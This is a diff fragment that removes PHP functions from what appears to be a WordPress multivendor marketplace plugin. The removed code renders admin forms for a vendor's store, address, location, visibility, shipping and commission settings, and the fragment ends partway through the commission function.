-	function wcfmmp_vendor_manage_marketplace_setting( $vendor_id ) {
-		global $WCFM, $WCFMmp;
-
-		if( !$vendor_id ) return;
-
-		$disable_vendor = get_user_meta( $vendor_id, '_disable_vendor', true );
-		if( $disable_vendor ) return;
-
-		$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-		if( !$vendor_data ) $vendor_data = array();
-
-		$the_vendor_user = get_user_by( 'id', $vendor_id );
-
-		// Store General
-		$gravatar          = isset( $vendor_data['gravatar'] ) ? absint( $vendor_data['gravatar'] ) : 0;
-		$banner_type       = isset( $vendor_data['banner_type'] ) ? $vendor_data['banner_type'] : 'single_img';
-		$banner            = isset( $vendor_data['banner'] ) ? absint( $vendor_data['banner'] ) : 0;
-		$banner_video      = isset( $vendor_data['banner_video'] ) ? $vendor_data['banner_video'] : '';
-		$banner_slider     = isset( $vendor_data['banner_slider'] ) ? $vendor_data['banner_slider'] : array();
-		$list_banner_type  = isset( $vendor_data['list_banner_type'] ) ? $vendor_data['list_banner_type'] : 'single_img';
-		$list_banner       = isset( $vendor_data['list_banner'] ) ? absint( $vendor_data['list_banner'] ) : 0;
-		$list_banner_video = isset( $vendor_data['list_banner_video'] ) ? $vendor_data['list_banner_video'] : '';
-		$mobile_banner     = isset( $vendor_data['mobile_banner'] ) ? $vendor_data['mobile_banner'] : '';
-
-		$store_name     = wcfm_get_vendor_store_name( $vendor_id );
-		$store_slug     = '';
-		$user_email     = '';
-		if( $vendor_id != 99999 ) {
-			$store_name     = empty( $store_name ) ? $the_vendor_user->display_name : $store_name;
-			$store_slug     = $the_vendor_user->user_nicename;
-			$user_email     = $the_vendor_user->user_email;
-		}
-		$store_email      = isset( $vendor_data['store_email'] ) ? esc_attr( $vendor_data['store_email'] ) : $user_email;
-		$phone            = isset( $vendor_data['phone'] ) ? esc_attr( $vendor_data['phone'] ) : '';
-
-		// Shop Description
-		$shop_description = wcfm_get_user_meta( $vendor_id, '_store_description', true );
-
-		// Address
-		$address  = isset( $vendor_data['address'] ) ? $vendor_data['address'] : '';
-		$street_1 = isset( $vendor_data['address']['street_1'] ) ? $vendor_data['address']['street_1'] : '';
-		$street_2 = isset( $vendor_data['address']['street_2'] ) ? $vendor_data['address']['street_2'] : '';
-		$city     = isset( $vendor_data['address']['city'] ) ? $vendor_data['address']['city'] : '';
-		$zip      = isset( $vendor_data['address']['zip'] ) ? $vendor_data['address']['zip'] : '';
-		$country  = isset( $vendor_data['address']['country'] ) ? $vendor_data['address']['country'] : '';
-		$state    = isset( $vendor_data['address']['state'] ) ? $vendor_data['address']['state'] : '';
-
-		// Location
-		$store_location   = isset( $vendor_data['store_location'] ) ? esc_attr( $vendor_data['store_location'] ) : '';
-		$map_address    = isset( $vendor_data['find_address'] ) ? esc_attr( $vendor_data['find_address'] ) : '';
-		$store_lat    = isset( $vendor_data['store_lat'] ) ? esc_attr( $vendor_data['store_lat'] ) : 0;
-		$store_lng    = isset( $vendor_data['store_lng'] ) ? esc_attr( $vendor_data['store_lng'] ) : 0;
-
-		// Country -> States
-		$country_obj   = new WC_Countries();
-		$countries     = $country_obj->countries;
-		$states        = $country_obj->states;
-		$state_options = array();
-		if( $state && isset( $states[$country] ) && is_array( $states[$country] ) ) {
-			$state_options = $states[$country];
-		}
-		if( $state ) $state_options[$state] = $state;
-
-		// Gravatar image
-		$gravatar_url = $gravatar;// ? wp_get_attachment_url( $gravatar ) : '';
-
-		// List Banner URL
-		$list_banner_url = $list_banner;// ? wp_get_attachment_url( $list_banner ) : '';
-
-		// Banner URL
-		$banner_url = $banner;// ? wp_get_attachment_url( $banner ) : '';
-
-		// Mobile Banner URL
-		$mobile_banner_url = $mobile_banner;// ? wp_get_attachment_url( $mobile_banner ) : '';
-
-		// Visiblity
-		$global_store_name_position = isset( $WCFMmp->wcfmmp_marketplace_options['store_name_position'] ) ? $WCFMmp->wcfmmp_marketplace_options['store_name_position'] : 'on_banner';
-		$store_name_position   = isset( $vendor_data['store_name_position'] ) ? esc_attr( $vendor_data['store_name_position'] ) : $global_store_name_position;
-		$global_store_ppp       = isset( $WCFMmp->wcfmmp_marketplace_options['store_ppp'] ) ? $WCFMmp->wcfmmp_marketplace_options['store_ppp'] : get_option('posts_per_page');
-		$store_ppp              = isset( $vendor_data['store_ppp'] ) ? absint( $vendor_data['store_ppp'] ) : $global_store_ppp;
-		$store_hide_email       = isset( $vendor_data['store_hide_email'] ) ? esc_attr( $vendor_data['store_hide_email'] ) : 'no';
-		$store_hide_phone       = isset( $vendor_data['store_hide_phone'] ) ? esc_attr( $vendor_data['store_hide_phone'] ) : 'no';
-		$store_hide_address     = isset( $vendor_data['store_hide_address'] ) ? esc_attr( $vendor_data['store_hide_address'] ) : 'no';
-		$store_hide_map         = isset( $vendor_data['store_hide_map'] ) ? esc_attr( $vendor_data['store_hide_map'] ) : 'no';
-		$store_hide_description = isset( $vendor_data['store_hide_description'] ) ? esc_attr( $vendor_data['store_hide_description'] ) : 'no';
-		$store_hide_policy      = isset( $vendor_data['store_hide_policy'] ) ? esc_attr( $vendor_data['store_hide_policy'] ) : 'no';
-
-		$store_banner_width   = isset( $WCFMmp->wcfmmp_marketplace_options['store_banner_width'] ) ? $WCFMmp->wcfmmp_marketplace_options['store_banner_width'] : '1650';
-		$store_banner_height  = isset( $WCFMmp->wcfmmp_marketplace_options['store_banner_height'] ) ? $WCFMmp->wcfmmp_marketplace_options['store_banner_height'] : '350';
-		$store_banner_mwidth  = isset( $WCFMmp->wcfmmp_marketplace_options['store_banner_mwidth'] ) ? $WCFMmp->wcfmmp_marketplace_options['store_banner_mwidth'] : '520';
-		$store_banner_mheight = isset( $WCFMmp->wcfmmp_marketplace_options['store_banner_mheight'] ) ? $WCFMmp->wcfmmp_marketplace_options['store_banner_mheight'] : '150';
-
-		$banner_help_text = sprintf(
-				__('Upload a banner for your store. Banner size is (%sx%s) pixels.', 'wc-frontend-manager' ),
-				$store_banner_width, $store_banner_height
-		);
-
-		?>
-
-		<!-- collapsible -->
-		<div class="page_collapsible vendor_manage_store_setting" id="wcfm_vendor_manage_form_store_settings_head"><label class="wcfmfa fa-home"></label><?php _e( 'Store Settings', 'wc-frontend-manager' ); ?><span></span></div>
-		<div class="wcfm-container">
-			<div id="wcfm_vendor_manage_form_store_setting_expander" class="wcfm-content">
-			  <?php if( $vendor_id != 99999 ) { ?>
-				<form id="wcfm_vendor_manage_store_setting_form" class="wcfm">
-				<?php } ?>
-					<div class=""><h2><?php _e( 'General Setting', 'wc-multivendor-marketplace' ); ?></h2></div>
-					<div class="wcfm_clearfix"></div>
-
-					<div class="store_address">
-						<?php
-						$WCFM->wcfm_fields->wcfm_generate_form_field( apply_filters( 'wcfm_marketplace_settings_fields_general', array(
-																																																	"store_name"  => array('label' => __('Store Name', 'wc-frontend-manager') , 'type' => 'text', 'class' => 'wcfm-text wcfm_ele wcfm_name_input', 'label_class' => 'wcfm_title wcfm_ele', 'custom_attributes' => array( 'required' => true ), 'value' => $store_name ),
-																																																	"store_slug"  => array('label' => __('Store Slug', 'wc-frontend-manager') , 'type' => 'text', 'class' => 'wcfm-text wcfm_ele wcfm_slug_input', 'label_class' => 'wcfm_title wcfm_ele', 'custom_attributes' => array( 'required' => true ), 'value' => urldecode($store_slug) ),
-																																																	"store_email" => array('label' => __('Store Email', 'wc-frontend-manager') , 'type' => 'text', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'value' => $store_email ),
-																																																	"phone"       => array('label' => __('Store Phone', 'wc-frontend-manager') , 'type' => 'text', 'placeholder' => '+123456..', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'value' => $phone ),
-																																																	"vendor_id" => array( 'type' => 'hidden', 'value' => $vendor_id )
-																																																	), $vendor_id ) );
-
-						?>
-					</div>
-
-					<div class=""><h2><?php _e( 'Store Brand Setup', 'wc-multivendor-marketplace' ); ?></h2></div>
-					<div class="wcfm_clearfix"></div>
-
-					<div class="store_address">
-					  <?php
-					  $store_banner_types = array( 'single_img' => __( 'Static Image', 'wc-frontend-manager' ), 'slider' => __( 'Slider', 'wc-frontend-manager' ), 'video' => __( 'Video', 'wc-frontend-manager' ) );
-						$store_list_banner_types = array( 'single_img' => __( 'Static Image', 'wc-frontend-manager' ), 'video' => __( 'Video', 'wc-frontend-manager' ) );
-						$WCFM->wcfm_fields->wcfm_generate_form_field( apply_filters( 'wcfm_marketplace_settings_fields_general', array(
-																																																	"gravatar" => array('label' => __('Store Logo', 'wc-frontend-manager') , 'type' => 'upload', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title', 'prwidth' => 150, 'value' => $gravatar_url, 'hints' => __( 'Preferred  size is (125x125) pixels.', 'wc-frontend-manager' ) ),
-																																																	"banner_type" => array('label' => __('Store Banner Type', 'wc-frontend-manager') , 'type' => 'select', 'options' => array( 'single_img' => __( 'Static Image', 'wc-frontend-manager' ), 'slider' => __( 'Slider', 'wc-frontend-manager' ), 'video' => __( 'Video', 'wc-frontend-manager' ) ), 'class' => 'wcfm-select wcfm_ele wcfm-banner-uploads', 'label_class' => 'wcfm_title', 'value' => $banner_type, ),
-																																																	"banner" => array('label' => __('Banner', 'wc-frontend-manager') , 'type' => 'upload', 'class' => 'wcfm-text wcfm_ele banner_type_upload banner_type_field banner_type_single_img wcfm-banner-uploads', 'label_class' => 'wcfm_title banner_type_field banner_type_single_img', 'prwidth' => 250, 'value' => $banner_url, 'hints' => $banner_help_text ),
-																																																	"banner_video" => array('label' => __('Video Banner', 'wc-frontend-manager') , 'type' => 'text', 'class' => 'wcfm-text wcfm_ele banner_type_field banner_type_video', 'label_class' => 'wcfm_title banner_type_field banner_type_video','value' => $banner_video, 'hints' => __( 'Insert YouTube video URL.', 'wc-frontend-manager' ) ),
-																																																	"banner_slider"  => array( 'label' => __('Slider', 'wc-frontend-manager'), 'type' => 'multiinput', 'class' => 'wcfm-text wcfm_ele banner_type_upload banner_type_field banner_type_slider wcfm_non_sortable', 'label_class' => 'wcfm_title banner_type_field banner_type_slider', 'value' => $banner_slider, 'hints' => $banner_help_text, 'options' => array(
-																																																																										"image" => array( 'type' => 'upload', 'class' => 'wcfm_gallery_upload banner_type_upload wcfm-banner-uploads', 'prwidth' => 75),
-																																																																										"link"  => array( 'type' => 'text', 'class' => 'wcfm-text banner_type_slilder_link', 'placeholder' => __( 'Slider Hyperlink', 'wc-frontend-manager' ) ),
-																																																																									) ),
-																																																	"slider_break" => array( 'type' => 'html', 'value' => '<div class="wcfm_clearfix"></div>' ),
-
-																																																	"mobile_banner" => array('label' => __('Mobile Banner', 'wc-frontend-manager') , 'type' => 'upload', 'class' => 'wcfm-text wcfm_ele wcfm-banner-uploads', 'label_class' => 'wcfm_title', 'prwidth' => 250, 'value' => $mobile_banner_url, 'hints' => __( 'This Banner will be visible when someone browse store from Mobile.', 'wc-frontend-manager' ) ),
-
-																																																	"list_banner_type" => array('label' => __('Store List Banner Type', 'wc-frontend-manager') , 'type' => 'select', 'options' => $store_list_banner_types, 'class' => 'wcfm-select wcfm_ele wcfm-list-banner-uploads', 'label_class' => 'wcfm_title', 'value' => $list_banner_type ),
-																																																	"list_banner" => array('label' => __('Store List Banner', 'wc-frontend-manager') , 'type' => 'upload', 'class' => 'wcfm-text wcfm_ele wcfm-banner-uploads list_banner_type_upload list_banner_type_field list_banner_type_single_img', 'label_class' => 'wcfm_title list_banner_type_field list_banner_type_single_img', 'prwidth' => 250, 'value' => $list_banner_url, 'hints' => __( 'This Banner will be visible at Store List Page.', 'wc-frontend-manager' ) ),
-
-																																																	"list_banner_video" => array('label' => __('Store List Video Banner', 'wc-frontend-manager') , 'type' => 'text', 'class' => 'wcfm-text wcfm_ele list_banner_type_field list_banner_type_video', 'label_class' => 'wcfm_title list_banner_type_field list_banner_type_video','value' => $list_banner_video, 'hints' => __( 'Insert YouTube video URL.', 'wc-frontend-manager' ) ),
-
-																																																	"shop_description" => array('label' => __('Shop Description', 'wc-frontend-manager') , 'type' => 'wpeditor', 'class' => 'wcfm-textarea wcfm_ele wcfm_wpeditor', 'label_class' => 'wcfm_title', 'value' => $shop_description, 'hints' => __( 'This is displayed on your shop page.', 'wc-frontend-manager' ) ),
-																																																	), $vendor_id ) );
-					  ?>
-					</div>
-					<?php do_action( 'wcfmmp_admin_wcfm_store_general_settings_after', $vendor_id ); ?>
-
-					<?php if( $vendor_id != 99999 ) { ?>
-						<div class="wcfm-clearfix"></div>
-						<div class="wcfm-message" tabindex="-1"></div>
-						<div class="wcfm-clearfix"></div>
-						<div class="wcfm_messages_submit">
-							<input type="submit" name="save-data" value="<?php _e( 'Update', 'wc-frontend-manager' ); ?>" id="wcfm_store_general_setting_save_button" class="wcfm_submit_button" />
-						</div>
-						<div class="wcfm-clearfix"></div>
-				  <?php } ?>
-
-				  <?php if( !apply_filters('wcfm_is_pref_multi_store', true) ) { ?>
-					<div class="wcfm_clearfix"></div><br />
-					<div class="wcfm_vendor_settings_heading"><h2><?php _e( 'Store Address', 'wc-frontend-manager' ); ?></h2></div>
-					<div class="wcfm_clearfix"></div>
-
-					<div class="store_address store_address_wrap">
-						<?php
-							$WCFM->wcfm_fields->wcfm_generate_form_field( apply_filters( 'wcfm_marketplace_settings_fields_address', array(
-																																																"street_1" => array('label' => __('Street', 'wc-frontend-manager'), 'placeholder' => __('Street address', 'wc-frontend-manager'), 'name' => 'address[street_1]', 'type' => 'text', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'value' => $street_1 ),
-																																																"street_2" => array('label' => __('Street 2', 'wc-frontend-manager'), 'placeholder' => __('Apartment, suite, unit etc. (optional)', 'wc-frontend-manager'), 'name' => 'address[street_2]', 'type' => 'text', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'value' => $street_2 ),
-																																																"city" => array('label' => __('City/Town', 'wc-frontend-manager'), 'placeholder' => __('Town / City', 'wc-frontend-manager'), 'name' => 'address[city]', 'type' => 'text', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'value' => $city ),
-																																																"zip" => array('label' => __('Postcode/Zip', 'wc-frontend-manager'), 'placeholder' => __('Postcode / Zip', 'wc-frontend-manager'), 'name' => 'address[zip]', 'type' => 'text', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'value' => $zip ),
-																																																"country" => array('label' => __('Country', 'wc-frontend-manager'), 'name' => 'address[country]', 'type' => 'country', 'class' => 'wcfm-select wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'value' => $country ),
-																																																"state" => array('label' => __('State/County', 'wc-frontend-manager'), 'name' => 'address[state]', 'type' => 'select', 'class' => 'wcfm-select wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'options' => $state_options, 'value' => $state ),
-																																																), $vendor_id ) );
-						?>
-					</div>
-					<?php do_action( 'wcfmmp_admin_wcfm_store_address_settings_after', $vendor_id ); ?>
-					<script type="text/javascript">
-						var selected_state = '<?php echo esc_attr($state); ?>';
-						var input_selected_state = '<?php echo esc_attr($state); ?>';
-					</script>
-
-					<?php
-					$api_key = isset( $WCFMmp->wcfmmp_marketplace_options['wcfm_google_map_api'] ) ? $WCFMmp->wcfmmp_marketplace_options['wcfm_google_map_api'] : '';
-					$wcfm_map_lib = isset( $WCFMmp->wcfmmp_marketplace_options['wcfm_map_lib'] ) ? $WCFMmp->wcfmmp_marketplace_options['wcfm_map_lib'] : '';
-					if( !$wcfm_map_lib && $api_key ) { $wcfm_map_lib = 'google'; } elseif( !$wcfm_map_lib && !$api_key ) { $wcfm_map_lib = 'leaftlet'; }
-					if ( ( ($wcfm_map_lib == 'google') && !empty( $api_key ) ) || ($wcfm_map_lib == 'leaflet') ) {
-						?>
-						<div class="wcfm_clearfix"></div><br />
-						<div class="wcfm_vendor_settings_heading"><h2><?php _e( 'Store Location', 'wc-frontend-manager' ); ?></h2></div>
-						<div class="wcfm_clearfix"></div>
-						<div class="store_address store_location_wrap">
-							<?php
-								$WCFM->wcfm_fields->wcfm_generate_form_field( apply_filters( 'wcfm_marketplace_settings_fields_location', array(
-																																																	"find_address" => array( 'label' => __( 'Find Location', 'wc-frontend-manager' ), 'placeholder' => __( 'Type an address to find', 'wc-frontend-manager' ), 'type' => 'text', 'name' => 'geolocation[find_address]', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'value' => $map_address ),
-																																																	"store_location" => array( 'type' => 'hidden', 'name' => 'geolocation[store_location]', 'value' => $store_location ),
-																																																	"store_lat" => array( 'type' => 'hidden', 'name' => 'geolocation[store_lat]', 'value' => $store_lat ),
-																																																	"store_lng" => array( 'type' => 'hidden', 'name' => 'geolocation[store_lng]', 'value' => $store_lng ),
-																																																	), $vendor_id ) );
-							?>
-							<div class="wcfm_clearfix"></div><br />
-							<div class="wcfm-marketplace-google-map" id="wcfm-marketplace-map"></div>
-							<div class="wcfm_clearfix"></div><br />
-						</div>
-					<?php
-					}
-					?>
-					<?php do_action( 'wcfmmp_admin_wcfm_store_location_settings_after', $vendor_id ); ?>
-
-					<?php if( $vendor_id != 99999 ) { ?>
-						<div class="wcfm-clearfix"></div>
-						<div class="wcfm-message" tabindex="-1"></div>
-						<div class="wcfm-clearfix"></div>
-						<div class="wcfm_messages_submit">
-							<input type="submit" name="save-data" value="<?php _e( 'Update', 'wc-frontend-manager' ); ?>" id="wcfm_store_address_setting_save_button" class="wcfm_submit_button" />
-						</div>
-						<div class="wcfm-clearfix"></div>
-				  	<?php } ?>
-				  <?php } ?>
-				  <?php do_action('wcfmmp_admin_before_store_visibility_settings', $vendor_id); ?>
-					<div class="wcfm_clearfix"></div><br />
-					<div class="wcfm_vendor_settings_heading"><h2><?php _e( 'Visibility Setup', 'wc-multivendor-marketplace' ); ?></h2></div>
-					<div class="wcfm_clearfix"></div>
-
-					<div class="store_address store_visibility_wrap">
-						<?php
-							$WCFM->wcfm_fields->wcfm_generate_form_field( apply_filters( 'wcfm_marketplace_settings_fields_visibility', array(
-								"store_name_position" => array( 'label' => __('Store Name Position', 'wc-multivendor-marketplace'), 'type' => 'select', 'options' => array( 'on_banner' => __( 'On Banner', 'wc-multivendor-marketplace' ), 'on_header' => __( 'At Header', 'wc-multivendor-marketplace' ) ), 'class' => 'wcfm-select wcfm_ele', 'label_class' => 'wcfm_title', 'value' => $store_name_position, 'hints' => __( 'Store name position at you Store Page.', 'wc-frontend-manager' ) ),
-								"store_ppp" => array( 'label' => __('Products per page', 'wc-multivendor-marketplace'), 'type' => 'number', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title', 'value' => $store_ppp, 'attributes' => array( 'min'=> 1, 'step' => 1 ), 'hints' => __( 'No of products at you Store Page.', 'wc-frontend-manager' ) ),
-								"store_hide_email" => array('label' => __( 'Hide Email from Store', 'wc-frontend-manager') , 'type' => 'checkbox', 'class' => 'wcfm-checkbox wcfm_ele', 'label_class' => 'wcfm_title checkbox_title wcfm_ele', 'value' => 'yes', 'dfvalue' => $store_hide_email ),
-								"store_hide_phone" => array('label' => __( 'Hide Phone from Store', 'wc-frontend-manager') , 'type' => 'checkbox', 'class' => 'wcfm-checkbox wcfm_ele', 'label_class' => 'wcfm_title checkbox_title wcfm_ele', 'value' => 'yes', 'dfvalue' => $store_hide_phone ),
-								"store_hide_address" => array('label' => __( 'Hide Address from Store', 'wc-frontend-manager') , 'type' => 'checkbox', 'class' => 'wcfm-checkbox wcfm_ele', 'label_class' => 'wcfm_title checkbox_title wcfm_ele', 'value' => 'yes', 'dfvalue' => $store_hide_address ),
-								"store_hide_map" => array('label' => __( 'Hide Map from Store', 'wc-frontend-manager') , 'type' => 'checkbox', 'class' => 'wcfm-checkbox wcfm_ele', 'label_class' => 'wcfm_title checkbox_title wcfm_ele', 'value' => 'yes', 'dfvalue' => $store_hide_map ),
-								"store_hide_description" => array('label' => __( 'Hide About from Store', 'wc-frontend-manager') , 'type' => 'checkbox', 'class' => 'wcfm-checkbox wcfm_ele', 'label_class' => 'wcfm_title checkbox_title wcfm_ele', 'value' => 'yes', 'dfvalue' => $store_hide_description ),
-								"store_hide_policy" => array('label' => __( 'Hide Policy from Store', 'wc-frontend-manager') , 'type' => 'checkbox', 'class' => 'wcfm-checkbox wcfm_ele', 'label_class' => 'wcfm_title checkbox_title wcfm_ele', 'value' => 'yes', 'dfvalue' => $store_hide_policy ),
-								), $vendor_id ) );
-						?>
-					</div>
-
-					<?php do_action( 'wcfmmp_admin_wcfm_vendor_settings_after', $vendor_id ); ?>
-
-					<?php if( $vendor_id != 99999 ) { ?>
-					<div class="wcfm-clearfix"></div>
-					<div class="wcfm-message" tabindex="-1"></div>
-					<div class="wcfm-clearfix"></div>
-					<div class="wcfm_messages_submit">
-						<input type="submit" name="save-data" value="<?php _e( 'Update', 'wc-frontend-manager' ); ?>" id="wcfm_store_setting_save_button" class="wcfm_submit_button" />
-					</div>
-					<div class="wcfm-clearfix"></div>
-				</form>
-				<?php } ?>
-			</div>
-		</div>
-		<div class="wcfm_clearfix"></div>
-		<?php if( $vendor_id != 99999 ) { ?>
-			<br />
-		<?php } ?>
-		<!-- end collapsible -->
-
-		<?php
-	}
-
-	/**
-	 * Vendor Store Shipping by Admin
-	 */
-	function wcfmmp_vendor_manage_shipping_setting( $vendor_id ) {
-		global $WCFM, $WCFMmp, $wpdb;
-
-		if( !apply_filters( 'wcfm_is_allow_store_shipping', true ) ) return;
-		if( !apply_filters( 'wcfm_is_allow_store_shipping_by_admin', true ) ) return;
-
-		$wcfm_shipping_options = get_option( 'wcfm_shipping_options', array() );
-		$wcfmmp_store_shipping_enabled = isset( $wcfm_shipping_options['enable_store_shipping'] ) ? $wcfm_shipping_options['enable_store_shipping'] : 'yes';
-		if( $wcfmmp_store_shipping_enabled != 'yes' ) return;
-		?>
-
-		<!-- collapsible -->
-		<div class="page_collapsible vendor_manage_store_shipping_setting" id="wcfm_vendor_manage_form_store_shipping_settings_head"><label class="wcfmfa fa-truck"></label><?php _e( 'Store Shipping', 'wc-multivendor-marketplace' ); ?><span></span></div>
-		<div class="wcfm-container">
-			<div id="wcfm_vendor_manage_form_store_shipping_setting_expander" class="wcfm-content">
-			  <?php if( $vendor_id != 99999 ) { ?>
-				<form id="wcfm_vendor_manage_store_shipping_setting_form" class="wcfm">
-				<?php } ?>
-
-				<?php do_action( 'wcfm_marketplace_shipping', $vendor_id ); ?>
-
-				<?php if( $vendor_id != 99999 ) { ?>
-					<div class="wcfm-clearfix"></div>
-					<div class="wcfm-message" tabindex="-1"></div>
-					<div class="wcfm-clearfix"></div>
-					<div id="wcfm_messages_submit">
-					  <input type="hidden" name="store_id" value="<?php echo esc_attr($vendor_id); ?>" />
-						<input type="submit" name="save-shipping-data" value="<?php esc_html_e( 'Update', 'wc-frontend-manager' ); ?>" id="wcfm_store_shipping_setting_save_button" class="wcfm_submit_button" />
-					</div>
-					<div class="wcfm-clearfix"></div>
-				</form>
-				<?php } ?>
-			</div>
-		</div>
-		<div class="wcfm_clearfix"></div>
-		<?php if( $vendor_id != 99999 ) { ?>
-			<br />
-		<?php } ?>
-		<!-- end collapsible -->
-
-		<?php
-	}
-
-
-	/**
-	 * Vendor Store Commission & Withdrwal Setting
-	 */
-	function wcfmmp_vendor_manage_commission_setting( $vendor_id ) {
-		global $WCFM, $WCFMmp;
-
-		if( !$vendor_id ) return;
-
-		if( !apply_filters( 'wcfm_is_allow_view_commission', true ) || !apply_filters( 'wcfm_is_allow_commission_manage', true ) ) return;
-
-		$disable_vendor = get_user_meta( $vendor_id, '_disable_vendor', true );
-		if( $disable_vendor ) return;
-
-		$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-		if( !$vendor_data ) $vendor_data = array();
-
-		// Payment
-		$payment_mode = isset( $vendor_data['payment']['method'] ) ? esc_attr( $vendor_data['payment']['method'] ) : '' ;
-		$paypal = isset( $vendor_data['payment']['paypal']['email'] ) ? esc_attr( $vendor_data['payment']['paypal']['email'] ) : '' ;
-		$skrill = isset( $vendor_data['payment']['skrill']['email'] ) ? esc_attr( $vendor_data['payment']['skrill']['email'] ) : '' ;
-		$ac_name   = isset( $vendor_data['payment']['bank']['ac_name'] ) ? esc_attr( $vendor_data['payment']['bank']['ac_name'] ) : '';
-		$ac_number = isset( $vendor_data['payment']['bank']['ac_number'] ) ? esc_attr( $vendor_data['payment']['bank']['ac_number'] ) : '';
-		$bank_name      = isset( $vendor_data['payment']['bank']['bank_name'] ) ? esc_attr( $vendor_data['payment']['bank']['bank_name'] ) : '';
-		$bank_addr      = isset( $vendor_data['payment']['bank']['bank_addr'] ) ? esc_textarea( $vendor_data['payment']['bank']['bank_addr'] ) : '';
-		$routing_number = isset( $vendor_data['payment']['bank']['routing_number'] ) ? esc_attr( $vendor_data['payment']['bank']['routing_number'] ) : '';
-		$iban           = isset( $vendor_data['payment']['bank']['iban'] ) ? esc_attr( $vendor_data['payment']['bank']['iban'] ) : '';
-		$swift     = isset( $vendor_data['payment']['bank']['swift'] ) ? esc_attr( $vendor_data['payment']['bank']['swift'] ) : '';
-		$ifsc     = isset( $vendor_data['payment']['bank']['ifsc'] ) ? esc_attr( $vendor_data['payment']['bank']['ifsc'] ) : '';
-
-		// Commission
-		$wcfm_commission_options = get_option( 'wcfm_commission_options', array() );
-		$wcfm_commission_for = isset( $wcfm_commission_options['commission_for'] ) ? $wcfm_commission_options['commission_for'] : 'vendor';
-
-		$wcfm_commission_types = get_wcfm_marketplace_commission_types();
-		$wcfm_commission_types = array_merge( array( 'global' => __( 'By Global Rule', 'wc-multivendor-marketplace' ) ), $wcfm_commission_types );
-
-		$vendor_commission_mode        = isset( $vendor_data['commission']['commission_mode'] ) ? $vendor_data['commission']['commission_mode'] : 'global';
-		$vendor_commission_fixed       = isset( $vendor_data['commission']['commission_fixed'] ) ? $vendor_data['commission']['commission_fixed'] : '';
-		$vendor_commission_percent     = isset( $vendor_data['commission']['commission_percent'] ) ? $vendor_data['commission']['commission_percent'] : '90';
-		$vendor_commission_by_sales    = isset( $vendor_data['commission']['commission_by_sales'] ) ? $vendor_data['commission']['commission_by_sales'] : array();
-		$vendor_commission_by_products = isset( $vendor_data['commission']['commission_by_products'] ) ? $vendor_data['commission']['commission_by_products'] : array();
-		$vendor_commission_by_quantity = isset( $vendor_data['commission']['commission_by_quantity'] ) ? $vendor_data['commission']['commission_by_quantity'] : array();
-		$vendor_get_shipping           = isset( $vendor_data['commission']['get_shipping'] ) ? $vendor_data['commission']['get_shipping'] : '';
-		$vendor_get_tax                = isset( $vendor_data['commission']['get_tax'] ) ? $vendor_data['commission']['get_tax'] : '';
-		$vendor_coupon_deduct          = isset( $vendor_data['commission']['coupon_deduct'] ) ? $vendor_data['commission']['coupon_deduct'] : '';
-		$admin_coupon_deduct           = isset( $vendor_data['commission']['admin_coupon_deduct'] ) ? $vendor_data['commission']['admin_coupon_deduct'] : '';
-
-		$tax_enable                    = isset( $vendor_data['commission']['tax_enable'] ) ? 'yes' : 'no';
-		$tax_name                      = isset( $vendor_data['commission']['tax_name'] ) ? $vendor_data['commission']['tax_name'] : '';
-		$tax_percent                   = isset( $vendor_data['commission']['tax_percent'] ) ? $vendor_data['commission']['tax_percent'] : '';
-
-		// Withdrawal
-		$wcfm_withdrawal_options = array( 'global' => __( 'By Global Rule', 'wc-multivendor-marketplace' ), 'vendor' => __( 'Vendor Specific Rule', 'wc-multivendor-marketplace' ) );
-
-		// Global Options
-		$withdrawal_global_options       = get_option( 'wcfm_withdrawal_options', array() );
-		$request_auto_approve            = isset( $withdrawal_global_options['request_auto_approve'] ) ? $withdrawal_global_options['request_auto_approve'] : 'no';
-		$withdrawal_limit                = isset( $withdrawal_global_options['withdrawal_limit'] ) ? $withdrawal_global_options['withdrawal_limit'] : '';
-		$withdrawal_thresold             = isset( $withdrawal_global_options['withdrawal_thresold'] ) ? $withdrawal_global_options['withdrawal_thresold'] : '';
-		$withdrawal_charge_type          = isset( $withdrawal_global_options['withdrawal_charge_type'] ) ? $withdrawal_global_options['withdrawal_charge_type'] : 'no';
-		$withdrawal_charge               = isset( $withdrawal_global_options['withdrawal_charge'] ) ? $withdrawal_global_options['withdrawal_charge'] : array();
-		$transaction_charge_type         = isset( $withdrawal_global_options['transaction_charge_type'] ) ? $withdrawal_global_options['transaction_charge_type'] : 'no';
-		$transaction_charge              = isset( $withdrawal_global_options['transaction_charge'] ) ? $withdrawal_global_options['transaction_charge'] : array();
-
-		$vendor_withdrawal_mode          = isset( $vendor_data['withdrawal']['withdrawal_mode'] ) ? $vendor_data['withdrawal']['withdrawal_mode'] : 'global';
-		$request_auto_approve            = isset( $vendor_data['withdrawal']['request_auto_approve'] ) ? $vendor_data['withdrawal']['request_auto_approve'] : $request_auto_approve;
-		$withdrawal_limit                = isset( $vendor_data['withdrawal']['withdrawal_limit'] ) ? $vendor_data['withdrawal']['withdrawal_limit'] : $withdrawal_limit;
-		$withdrawal_thresold             = isset( $vendor_data['withdrawal']['withdrawal_thresold'] ) ? $vendor_data['withdrawal']['withdrawal_thresold'] : $withdrawal_thresold;
-		$withdrawal_charge_type          = isset( $vendor_data['withdrawal']['withdrawal_charge_type'] ) ? $vendor_data['withdrawal']['withdrawal_charge_type'] : $withdrawal_charge_type;
-
-		$vendor_withdrawal_charge        = isset( $vendor_data['withdrawal']['withdrawal_charge'] ) ? $vendor_data['withdrawal']['withdrawal_charge'] : $withdrawal_charge;
-		$withdrawal_charge_paypal        = isset( $vendor_withdrawal_charge['paypal'] ) ? $vendor_withdrawal_charge['paypal'] : array();
